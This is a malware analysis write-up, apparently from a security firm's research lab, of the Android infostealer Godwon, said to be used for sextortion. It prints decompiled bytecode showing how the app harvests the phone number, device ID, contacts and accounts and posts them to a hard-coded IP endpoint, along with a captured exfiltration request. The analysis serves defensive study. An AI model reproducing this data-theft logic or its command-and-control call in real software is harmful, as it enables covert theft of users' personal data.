Android InfoStealer – Godwon – Analysis

Android InfoStealer – Godwon – Analysis

Analysis

From the description on contagio mobile this Android InfoStealer malware, Godwon, is used by an online criminal group for ‘sextortion’. Honestly, I had never heard of this term before, but apparently it is a form of sexual exploitation that employs non-physical forms of coercion to extort sexual favors from the victim (Wikipedia).

The malware only contains one Activity and Service, and request permissions to read the phone state, access contacts, accounts, and connect to the Internet.

-> com.xingai.contact.MainActivity -> com.xingai.contact.service.GogleService

godwon2_ida_01

The MainActivity only performs one specific operation, which is to create a new Intent object and send it over to the ‘GogleService’

***************************************************************************

onCreate-BB@0x0 :

0 (00000000) invoke-super v2, v3, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V

1 (00000006) new-instance v0, Landroid/content/Intent;

2 (0000000a) const-class v1, Lcom/xinghai/contact/service/GogleService;

3 (0000000e) invoke-direct v0, v2, v1, Landroid/content/Intent;-><init>(Landroid/content/Context; Ljava/lang/Class;)V

4 (00000014) invoke-virtual v2, v0, Lcom/xinghai/contact/MainActivity;->startService(Landroid/content/Intent;)Landroid/content/ComponentName;

5 (0000001a) invoke-virtual v2, Lcom/xinghai/contact/MainActivity;->finish()V

6 (00000020) return-void

***************************************************************************

Godwon attempts to access or create a SharePreference’s file -> ‘abc.xml’, which it uses to updates how many times it has been opened, or how many times it has ex-filled target data. The GogleService creates a TelephonyManager object through a call to getSystemService(), with the argument ‘phone’. It uses this object to call getLine1Number() in order to access the victims number.

8 (0000001e) move-result-object v0

9 (00000020) check-cast v0, Landroid/telephony/TelephonyManager;

10 (00000024) iput-object v0, v4, Lcom/xinghai/contact/service/GogleService;->manager Landroid/telephony/TelephonyManager;

11 (00000028) iget-object v0, v4, Lcom/xinghai/contact/service/GogleService;->manager Landroid/telephony/TelephonyManager;

12 (0000002c) invoke-virtual v0, Landroid/telephony/TelephonyManager;->getLine1Number()Ljava/lang/String;

13 (00000032) move-result-object v0

It also subsequently calls getDeviceId() on the TelephonyManager object

onCreate-BB@0x64 :

26 (00000064) iget-object v0, v4, Lcom/xinghai/contact/service/GogleService;->manager Landroid/telephony/TelephonyManager;

27 (00000068) invoke-virtual v0, Landroid/telephony/TelephonyManager;->getDeviceId()Ljava/lang/String;

28 (0000006e) move-result-object v0

29 (00000070) iput-object v0, v4, Lcom/xinghai/contact/service/GogleService;->number Ljava/lang/String; [ onCreate-BB@0x74 ]

It follows this with a check to the count reference within ‘abc.xml’, then jumps it not equal into creating a new instance of itself. Here is where it gets interesting! The service access a utility class called HttpTools, where it accesses contacts, Skype accounts, etc. Obviously this directly correlates to the permissions it requested upon installation.

0 (00000000) const-string v4, 'tag'

1 (00000004) const-string v5, '2'

2 (00000008) invoke-static v4, v5, Landroid/util/Log;->e(Ljava/lang/String; Ljava/lang/String;)I

3 (0000000e) iget-object v4, v7, Lcom/xinghai/contact/service/GogleService$1;->this$0 Lcom/xinghai/contact/service/GogleService;

4 (00000012) invoke-static v4, Lcom/xinghai/contact/tools/HttpTools;->getContacts(Landroid/content/Context;)Ljava/lang/String;

5 (00000018) move-result-object v3

6 (0000001a) iget-object v4, v7, Lcom/xinghai/contact/service/GogleService$1;->this$0 Lcom/xinghai/contact/service/GogleService;

7 (0000001e) invoke-static v4, Lcom/xinghai/contact/tools/HttpTools;->getSkypeAcount(Landroid/content/Context;)Ljava/lang/String;

8 (00000024) move-result-object v0

You can see the getContacts() method accessing the target Content Provider in order to extract the Contact information.

getContacts-BB@0x0 :

0 (00000000) const/4 v2, 0

1 (00000002) new-instance v13, Ljava/lang/StringBuilder;

2 (00000006) invoke-direct v13, Ljava/lang/StringBuilder;-><init>()V

3 (0000000c) invoke-virtual v15, Landroid/content/Context;->getContentResolver()Landroid/content/ContentResolver;

4 (00000012) move-result-object v0

5 (00000014) sget-object v1, Landroid/provider/ContactsContract$Contacts;->CONTENT_URI Landroid/net/Uri;

6 (00000018) move-object v3, v2

7 (0000001a) move-object v4, v2

8 (0000001c) move-object v5, v2

9 (0000001e) invoke-virtual/rangev0, v1, v2, v3, v4, Landroid/content/ContentResolver;->query(Landroid/net/Uri; [Ljava/lang/String; Ljava/lang/String; [Ljava/lang/String; Ljava/lang/String;)Landroid/database/Cursor;

10 (00000024) move-result-object v7

11 (00000026) if-eqz v7, 172 [ getContacts-BB@0x2a getContacts-BB@0x17e ]

Within the getSkypeAccount() method, it attempts to access your Skype account if you have it configured.

getSkypeAcount-BB@0x0 :
 
0 (00000000) invoke-static v9, Landroid/accounts/AccountManager;->get(Landroid/content/Context;)Landroid/accounts/AccountManager;
 
1 (00000006) move-result-object v3
 
2 (00000008) invoke-virtual v3, Landroid/accounts/AccountManager;->getAccounts()[Landroid/accounts/Account;
 
3 (0000000e) move-result-object v1
 
4 (00000010) new-instance v4, Ljava/lang/StringBuilder;
 
5 (00000014) invoke-direct v4, Ljava/lang/StringBuilder;-><init>()V
 
6 (0000001a) array-length v6, v1
 
7 (0000001c) const/4 v5, 0 [ getSkypeAcount-BB@0x1e ]
 
0:75
 
(Ljava/lang/Exception; -> 7c getSkypeAcount-BB@0x7c)

After everything is said and done, it is time for the exfiltration. Godwon will take all the collected data, build a new Map, and call the postURL() method with a hard coded endpoint address -> “http://118.193.205.164/saves.ashx”.

23 (00000062) invoke-interface v1, v4, v5, Ljava/util/Map;->put(Ljava/lang/Object; Ljava/lang/Object;)Ljava/lang/Object;

24 (00000068) const-string v4, 'sbid'

25 (0000006c) iget-object v5, v7, Lcom/xinghai/contact/service/GogleService$1;->this$0 Lcom/xinghai/contact/service/GogleService;

26 (00000070) invoke-static v5, Lcom/xinghai/contact/service/GogleService;->access$0(Lcom/xinghai/contact/service/GogleService;)Ljava/lang/String;

27 (00000076) move-result-object v5

28 (00000078) invoke-interface v1, v4, v5, Ljava/util/Map;->put(Ljava/lang/Object; Ljava/lang/Object;)Ljava/lang/Object;

29 (0000007e) const-string v4, 'http://118.193.205.164/saves.ashx'

30 (00000082) invoke-static v4, v1, Lcom/xinghai/contact/tools/HttpTools;->postUrl(Ljava/lang/String; Ljava/util/Map;)Ljava/lang/String;

31 (00000088) move-result-object v2

When we execute Godwon in our sandboxed environment, through an HTTP proxy we can capture the outbound request.

POST /saves.ashx HTTP/1.1

User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.3; Malware VM Build/JLS36G)

Host: 118.193.178.15

Connection: Keep-Alive

Accept-Encoding: gzip

Content-Type: application/x-www-form-urlencoded

Content-Length: 59

smscontent=<br/>&sbid=15555215554&sign=key7974538k459945k45

Protect Your Assets from Various Threat Actors

VerSprite’s Research and Development division (a.k.a VS-Labs) is comprised of individuals who are passionate about diving into the internals of various technologies.

Our clients rely on VerSprite’s unique offerings of zero-day vulnerability research and exploit development to protect their assets from various threat actors.

From advanced technical security training to our research for hire B.O.S.S offering, we help organizations solve their most complex technical challenges. Learn more about Research as a Service →

 

View our security advisories detailing vulnerabilities found in major products for MacOs, Windows, Android, and iOS.